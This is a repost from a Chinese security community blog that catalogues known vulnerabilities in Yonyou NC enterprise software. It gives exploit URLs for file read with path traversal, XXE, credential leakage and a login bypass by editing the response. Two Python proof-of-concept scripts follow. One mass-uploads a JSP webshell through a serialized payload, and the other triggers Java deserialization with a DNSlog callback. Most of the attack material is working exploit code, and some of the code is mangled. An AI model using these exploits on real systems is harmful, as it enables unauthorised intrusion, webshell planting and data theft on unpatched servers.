整理一下用友NC已知的漏洞

admin 2021年4月21日21:00:50评论1,684 views字数 4543阅读15分8秒阅读模式

今天整理一下NC系统的我已知的漏洞,如有缺失,欢迎大佬补全,因为我项目中遇到nc系统的次数还是很多的

1. 任意文件读取

filename参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=[1]

整理一下用友NC已知的漏洞

2.XXE

接口处的XXE漏洞

http://uapws/service/nc.uap.oba.update.IUpdateService?wsdl

整理一下用友NC已知的漏洞

3.后台SQL注入

因为需要进后台,这里就暂不说了

4.接口信息泄露

在其中有个接口可以获取数据库账户密码,不过是老版本了

http://x.x.x.x/uapws/service

整理一下用友NC已知的漏洞

5.控制台密码绕过

http://x.x.x.x/uapws/index.jsp

有时候这里的密码默认会直接在上面写着,或者123456,不过也可以通过返回包实现任意用户登录,这里我输入hack用户,密码随便填,抓包将返回包0改为1,即可任意用户登录

整理一下用友NC已知的漏洞

整理一下用友NC已知的漏洞

整理一下用友NC已知的漏洞

6.任意文件上传

poc如下

python3 poc.py -u http://1.1.1.1[2]

上传成功后会返回马的路径

import requests
import threadpool
import urllib3
import sys
import argparse
urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://google.com",
}
def multithreading(funcname, filename="url.txt", pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("n")]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def wirte_targets(vurl, filename):
with open(filename, "a+") as f:
f.write(vurl + "n")
return vurl
def exp(u):
uploadHeader = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "multipart/form-data;",
"Referer": "https://google.com"
}uploadData = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x02x74x00x09x46x49x4cx45x5fx4ex41x4dx45x74x00x09x74x30x30x6cx73x2ex6ax73x70x74x00x10x54x41x52x47x45x54x5fx46x49x4cx45x5fx50x41x54x48x74x00x10x2ex2fx77x65x62x61x70x70x73x2fx6ex63x5fx77x65x62x78"
shellFlag="123123F"
uploadData+=shellFlag
try:
req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
if req1.status_code == 200 :
req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
if req3.text.index(shellFlag)>=0:
printFlag = "[Getshell]" + u+"/t00ls.jsp" + "n"
print (printFlag)
wirte_targets(printFlag, "vuln.txt")
except :
pass
#print(printFlag, end="")
if name == "main":
if (len(sys.argv)) < 2:
print('useage : python' +str(sys.argv[0]) + ' -h')
else:
parser =argparse.ArgumentParser()
parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
parser.add_argument('-u',help="url -> example
"
,type=str,dest='check_url')

parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
args =parser.parse_args()
if args.check_url:
exp(args.check_url)
if(args.check_file):
multithreading(exp, args.check_file, 8)

7.最新的NC6.5版本反序列化

漏洞地址为

/service/~xbrl/XbrlPersistenceServlet

poc:

import requests
import threadpool
import urllib3
import sys
import base64
ip = ""
dnslog = "x79x37x64x70" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)


8.还有其他的吗?欢迎各位大佬补充下

published from :整理一下用友NC已知的漏洞[3]

References

[1] http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=: http://x.x.x.x/NCFindWeb?filename=&service=IPreAlertConfigService
[2] http://1.1.1.1: http://1.1.1.1/
[3] 整理一下用友NC已知的漏洞: https://articles.zsxq.com/id_j4rr21eagrpb.html


— END —


【周度激励】2021.4.12 ~ 2021.4.18公告

整理一下用友NC已知的漏洞


【火线Zone】


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~

我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!

欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!


整理一下用友NC已知的漏洞

整理一下用友NC已知的漏洞

关注我们 解锁更多挖洞姿势

本文始发于微信公众号(火线Zone):整理一下用友NC已知的漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月21日21:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   整理一下用友NC已知的漏洞https://cn-sec.com/archives/339830.html

发表评论

匿名网友 填写信息